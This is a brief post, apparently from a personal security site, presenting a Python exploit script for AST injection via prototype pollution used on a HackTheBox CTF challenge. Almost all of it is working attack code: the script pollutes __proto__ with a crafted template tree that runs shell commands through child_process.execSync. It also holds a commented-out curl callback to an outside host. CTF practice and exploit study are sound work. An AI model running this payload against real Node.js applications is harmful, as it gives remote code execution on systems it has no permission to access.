[MENU] | |||||||||
[THOUGHTS] | [TECH RESOURCES] | [TRASH TALK] | |||||||
[DANK MEMES] | [FEATURED ARTISTS] | [W] |
Here is an AST Injection example. Exploit was relying on the error output.
It was used on HackTheBox CTF.
For further information, please consider reading this article.
https://blog.p6.is/AST-Injection/
Have a nice day!
- #!/usr/bin/env python
-
- import requests
-
- TARGET_URL = 'http://docker.hackthebox.eu:32561'
-
- # make pollution
- r = requests.post(TARGET_URL + '/api/submit', json = {
- "artist.__proto__.prototype.type": "Program",
- "artist.__proto__.name" : "Haigh",
- # "__proto__.name": "process.mainModule.require('child_process').execSync(`curl 'http://devilinside.me:8080/'`)",
- "artist.__proto__.body": [{
- "type": "MustacheStatement",
- "path": 0,
- "params": [{
- "type": "NumberLiteral",
- "value": "process.mainModule.require('child_process').execSync(`sh -c 'whoami'`)"
- }],
- "loc": {
- "start": 0,
- "end": 0
- }
- }]
- })
- # execute
- print(r.text)
- r = requests.get(TARGET_URL)
- # print(r.text)
- print("done")